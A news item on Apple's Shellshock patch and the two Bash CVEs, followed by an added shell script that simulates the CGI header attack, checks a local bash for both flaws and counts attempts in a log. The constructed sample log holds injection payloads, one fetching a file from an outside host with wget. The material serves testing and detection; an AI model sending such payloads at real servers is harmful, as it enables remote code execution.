Apple has patched the Shellshock vulnerabilities almost a week after the first disclosure, according to media reports. The company said a “vast majority” of OS X users weren’t at risk, as the systems were safe “by default and not exposed to remote exploits of [GNU Bash] unless users configure advanced UNIX services.”
Bitdefender’s analysis shows the typical attack scenario is a request to a vulnerable CGI script, with the exploit code passed in the User-Agent header; the web server hands that header to the script as an environment variable, which is where Bash mishandles it. Bitdefender advises Mac OS X users to update immediately.
Initially identified and patched as a single issue (CVE-2014-6271), the Bash flaw was assigned a second identifier, CVE-2014-7169, after the first fix proved incomplete; the follow-up patch shipped on Sept. 26. In the meantime, the Bash flaws were being actively exploited in the wild.
“It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables,” Linux vendor Red Hat said. “An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands.”
The company warned that, even with the initial patch applied, applications and services that let remote, unauthenticated attackers supply environment variables could still be exploited.
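To make the attack path and the two patch levels concrete, the script below is an added example, not code from Apple, Bitdefender or Red Hat. It reproduces the CGI handoff described above (the User-Agent header becomes the HTTP_USER_AGENT environment variable), wraps the widely circulated one-line checks for CVE-2014-6271 and CVE-2014-7169 in functions that report "vulnerable" or "patched", and counts injection attempts in a web server access log. It assumes a Unix-like host with `bash`, `grep` and `mktemp` on the path; the log lines and the attacker payloads are constructed for the example, not real traffic.

```shell
#!/bin/sh
# Added example (not from the original article): Shellshock attack path,
# local vulnerability checks for both CVEs, and access-log detection.

# 1. A web server running CGI exports request headers as environment
#    variables (User-Agent -> HTTP_USER_AGENT). A vulnerable bash treated any
#    variable whose value begins with "() {" as an exported function and kept
#    parsing past the closing brace, so the trailing command ran as soon as the
#    CGI script started bash. On a patched bash the value is an inert string.
simulate_cgi_request() {
  payload='() { :; }; echo INJECTED'      # constructed attacker User-Agent
  env HTTP_USER_AGENT="$payload" bash -c 'echo "handled request, UA=$HTTP_USER_AGENT"'
}

# 2. Check for CVE-2014-6271: if the command after the function body runs,
#    "vulnerable" appears in the output. Prints vulnerable/patched/no-bash.
check_cve_2014_6271() {
  command -v bash >/dev/null 2>&1 || { echo no-bash; return 2; }
  out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
  case "$out" in
    *vulnerable*) echo vulnerable; return 1 ;;
    *)            echo patched;    return 0 ;;
  esac
}

# 3. Check for CVE-2014-7169 (the incomplete first fix): the crafted value
#    leaves the parser in a state where the next command's first word is taken
#    as a redirection, so "echo date" writes the date into a file named "echo"
#    instead of printing it. Run in a scratch directory and look for that file.
check_cve_2014_7169() {
  command -v bash >/dev/null 2>&1 || { echo no-bash; return 2; }
  d=$(mktemp -d) || return 2
  ( cd "$d" && env X='() { (a)=>\' bash -c 'echo date' ) >/dev/null 2>&1 || true
  if [ -e "$d/echo" ]; then r=vulnerable; rc=1; else r=patched; rc=0; fi
  rm -rf "$d"
  echo "$r"
  return $rc
}

# 4. Detection: count lines carrying the "() {" function prefix that every
#    Shellshock payload needs. Works on combined-format access logs, where it
#    lands in the User-Agent or Referer field, and on raw header dumps. The
#    regex tolerates the spacing variants seen in the wild; it is deliberately
#    broad, so review hits rather than blocking on them blindly.
count_shellshock_attempts() {
  grep -Ec '\(\)[[:space:]]*\{' "$1"
}

# Constructed sample access log (not real traffic): two attempts, one benign hit.
write_sample_log() {
  cat >"$1" <<'EOF'
203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c 'wget http://203.0.113.9/x -O /tmp/x'"
198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)"
203.0.113.5 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() {:;}; /bin/ping -c 1 203.0.113.9" "curl/7.37"
EOF
}

# Usage when run directly: show the CGI handoff, then the two checks and the
# log count for the constructed sample.
if [ "${0##*/}" = "shellshock_check.sh" ]; then
  simulate_cgi_request
  echo "CVE-2014-6271: $(check_cve_2014_6271 || true)"
  echo "CVE-2014-7169: $(check_cve_2014_7169 || true)"
  log=$(mktemp) && write_sample_log "$log"
  echo "attempts in sample log: $(count_shellshock_attempts "$log")"
  rm -f "$log"
fi
```

Both checks exercise the installed bash itself, so they are the thing to run on an OS X or Linux host after installing the vendor update: "patched" for CVE-2014-6271 alone is not enough, since that is exactly the state Red Hat described as still exploitable. The log count is a triage aid, not a blocklist; a hit on a CGI path that returned 200 deserves a look at what the script did with its environment.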
Bash is a UNIX command shell that ships with OS X and with most Linux distributions, including Red Hat, Debian and Ubuntu.